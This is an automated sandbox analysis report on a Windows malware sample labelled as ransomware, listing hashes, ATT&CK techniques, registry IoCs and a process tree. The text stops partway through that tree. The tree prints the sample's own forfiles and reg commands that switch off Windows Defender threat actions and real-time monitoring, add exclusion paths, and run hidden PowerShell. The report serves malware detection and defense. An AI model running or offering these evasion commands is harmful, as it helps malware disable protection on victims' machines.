413c42a5547e336e370fc74d9ad0ced99cab7161fac4f713d0bd27bb454622ac

Analysis

max time kernel
97s
max time network
98s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
20/09/2024, 06:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
Size

6.7MB
MD5

6f1a1461f95d3de99d47f68b1da78513
SHA1

af4e0c845375a1f3206fc84225653a5d6a732109
SHA256

413c42a5547e336e370fc74d9ad0ced99cab7161fac4f713d0bd27bb454622ac
SHA512

4a759c451537f242687a342ec353a6e5d6b8f1d652f7e1706097a7b0be2dbbe7771a96223b15bb6d317c79add9b321c404f66f2e75bf5c93fafc74af4c4426cc
SSDEEP

98304:VTKb0nUegBAV7SEvurihfxZLR8moMy7WkBXjiD8LFV8ODkKOsPmnn751I37Uf:BKzegBAh2uBxWMy7nXmgvz+n7j2Uf

Score

10^/10

defense_evasion discovery evasion execution spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Windows security bypass 2 TTPs 30 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\YpcryChfqZNPHIVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pqEZrWlsHvsjYwEL = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\fJZgEdoSEgzXC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\OkFXZwGHSaUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\YaWymqZqwGbwcYnZF = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\jAmSRiPKU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\PBESNRhdmYKU2 = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pqEZrWlsHvsjYwEL = "0"	reg.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2700	powershell.exe
780	powershell.EXE
816	powershell.EXE
1956	powershell.exe
840	powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000\Control Panel\International\Geo\Nation	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Indirect Command Execution 1 TTPs 6 IoCs

Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

defense_evasion

Indirect Command Execution

T1202

pid	Process
2692	forfiles.exe
2540	forfiles.exe
2804	forfiles.exe
2752	forfiles.exe
2756	forfiles.exe
1812	forfiles.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gbaddinigglahkekcppiongkmgmpahml\3.0.1_0\manifest.json	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Drops file in System32 directory 9 IoCs

description	ioc	Process
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	\??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 13 IoCs

description	ioc	Process
File created	C:\Program Files\Mozilla Firefox\browser\features\{24E81385-CAF7-4F8F-94F4-CF985F9FF409}.xpi	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{24E81385-CAF7-4F8F-94F4-CF985F9FF409}.xpi	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\fdRZRCk.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\OkFXZwGHSaUn\LHsOvkB.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\jAmSRiPKU\RrtsBSE.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\PBESNRhdmYKU2\fhLBsWe.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\fJZgEdoSEgzXC\vzOloNF.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\RjbCmcSmxXHPWkOYaCR\aSNrPhV.xml	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\jAmSRiPKU\GTUFio.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\PBESNRhdmYKU2\OGsTvUqFXiboD.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
File created	C:\Program Files (x86)\fJZgEdoSEgzXC\ywDfdjA.dll	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\HxvKEihgfuYdkMf.job	schtasks.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3032	2132	WerFault.exe	29

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gpupdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	forfiles.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1668	schtasks.exe
1840	schtasks.exe
2608	schtasks.exe
400	schtasks.exe
1532	schtasks.exe
780	schtasks.exe
2440	schtasks.exe
2156	schtasks.exe
2332	schtasks.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2700	powershell.exe
2700	powershell.exe
2700	powershell.exe
780	powershell.EXE
780	powershell.EXE
780	powershell.EXE
816	powershell.EXE
816	powershell.EXE
816	powershell.EXE
1956	powershell.exe
840	powershell.EXE
840	powershell.EXE
840	powershell.EXE
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	2700	powershell.exe
Token: SeDebugPrivilege	780	powershell.EXE
Token: SeDebugPrivilege	816	powershell.EXE
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeIncreaseQuotaPrivilege	2484	WMIC.exe
Token: SeSecurityPrivilege	2484	WMIC.exe
Token: SeTakeOwnershipPrivilege	2484	WMIC.exe
Token: SeLoadDriverPrivilege	2484	WMIC.exe
Token: SeSystemProfilePrivilege	2484	WMIC.exe
Token: SeSystemtimePrivilege	2484	WMIC.exe
Token: SeProfSingleProcessPrivilege	2484	WMIC.exe
Token: SeIncBasePriorityPrivilege	2484	WMIC.exe
Token: SeCreatePagefilePrivilege	2484	WMIC.exe
Token: SeBackupPrivilege	2484	WMIC.exe
Token: SeRestorePrivilege	2484	WMIC.exe
Token: SeShutdownPrivilege	2484	WMIC.exe
Token: SeDebugPrivilege	2484	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2484	WMIC.exe
Token: SeRemoteShutdownPrivilege	2484	WMIC.exe
Token: SeUndockPrivilege	2484	WMIC.exe
Token: SeManageVolumePrivilege	2484	WMIC.exe
Token: 33	2484	WMIC.exe
Token: 34	2484	WMIC.exe
Token: 35	2484	WMIC.exe
Token: SeDebugPrivilege	840	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2132 wrote to memory of 2760	2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	30
PID 2132 wrote to memory of 2760	2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	30
PID 2132 wrote to memory of 2760	2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	30
PID 2132 wrote to memory of 2760	2132	202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe	30
PID 2760 wrote to memory of 2692	2760	cmd.exe	32
PID 2760 wrote to memory of 2692	2760	cmd.exe	32
PID 2760 wrote to memory of 2692	2760	cmd.exe	32
PID 2760 wrote to memory of 2692	2760	cmd.exe	32
PID 2692 wrote to memory of 2660	2692	forfiles.exe	33
PID 2692 wrote to memory of 2660	2692	forfiles.exe	33
PID 2692 wrote to memory of 2660	2692	forfiles.exe	33
PID 2692 wrote to memory of 2660	2692	forfiles.exe	33
PID 2660 wrote to memory of 2852	2660	cmd.exe	34
PID 2660 wrote to memory of 2852	2660	cmd.exe	34
PID 2660 wrote to memory of 2852	2660	cmd.exe	34
PID 2660 wrote to memory of 2852	2660	cmd.exe	34
PID 2760 wrote to memory of 2540	2760	cmd.exe	35
PID 2760 wrote to memory of 2540	2760	cmd.exe	35
PID 2760 wrote to memory of 2540	2760	cmd.exe	35
PID 2760 wrote to memory of 2540	2760	cmd.exe	35
PID 2540 wrote to memory of 3008	2540	forfiles.exe	36
PID 2540 wrote to memory of 3008	2540	forfiles.exe	36
PID 2540 wrote to memory of 3008	2540	forfiles.exe	36
PID 2540 wrote to memory of 3008	2540	forfiles.exe	36
PID 3008 wrote to memory of 2652	3008	cmd.exe	37
PID 3008 wrote to memory of 2652	3008	cmd.exe	37
PID 3008 wrote to memory of 2652	3008	cmd.exe	37
PID 3008 wrote to memory of 2652	3008	cmd.exe	37
PID 2760 wrote to memory of 2804	2760	cmd.exe	38
PID 2760 wrote to memory of 2804	2760	cmd.exe	38
PID 2760 wrote to memory of 2804	2760	cmd.exe	38
PID 2760 wrote to memory of 2804	2760	cmd.exe	38
PID 2804 wrote to memory of 2776	2804	forfiles.exe	39
PID 2804 wrote to memory of 2776	2804	forfiles.exe	39
PID 2804 wrote to memory of 2776	2804	forfiles.exe	39
PID 2804 wrote to memory of 2776	2804	forfiles.exe	39
PID 2776 wrote to memory of 2568	2776	cmd.exe	40
PID 2776 wrote to memory of 2568	2776	cmd.exe	40
PID 2776 wrote to memory of 2568	2776	cmd.exe	40
PID 2776 wrote to memory of 2568	2776	cmd.exe	40
PID 2760 wrote to memory of 2752	2760	cmd.exe	41
PID 2760 wrote to memory of 2752	2760	cmd.exe	41
PID 2760 wrote to memory of 2752	2760	cmd.exe	41
PID 2760 wrote to memory of 2752	2760	cmd.exe	41
PID 2752 wrote to memory of 2824	2752	forfiles.exe	42
PID 2752 wrote to memory of 2824	2752	forfiles.exe	42
PID 2752 wrote to memory of 2824	2752	forfiles.exe	42
PID 2752 wrote to memory of 2824	2752	forfiles.exe	42
PID 2824 wrote to memory of 2772	2824	cmd.exe	43
PID 2824 wrote to memory of 2772	2824	cmd.exe	43
PID 2824 wrote to memory of 2772	2824	cmd.exe	43
PID 2824 wrote to memory of 2772	2824	cmd.exe	43
PID 2760 wrote to memory of 2756	2760	cmd.exe	44
PID 2760 wrote to memory of 2756	2760	cmd.exe	44
PID 2760 wrote to memory of 2756	2760	cmd.exe	44
PID 2760 wrote to memory of 2756	2760	cmd.exe	44
PID 2756 wrote to memory of 2944	2756	forfiles.exe	45
PID 2756 wrote to memory of 2944	2756	forfiles.exe	45
PID 2756 wrote to memory of 2944	2756	forfiles.exe	45
PID 2756 wrote to memory of 2944	2756	forfiles.exe	45
PID 2944 wrote to memory of 2700	2944	cmd.exe	46
PID 2944 wrote to memory of 2700	2944	cmd.exe	46
PID 2944 wrote to memory of 2700	2944	cmd.exe	46
PID 2944 wrote to memory of 2700	2944	cmd.exe	46

C:\Users\Admin\AppData\Local\Temp\202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\202409206f1a1461f95d3de99d47f68b1da78513bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2132
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2692
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2660
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2852
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2540
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3008
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:2652
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    - Indirect Command Execution
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2804
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2776
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:2568
- - C:\Windows\SysWOW64\forfiles.exe
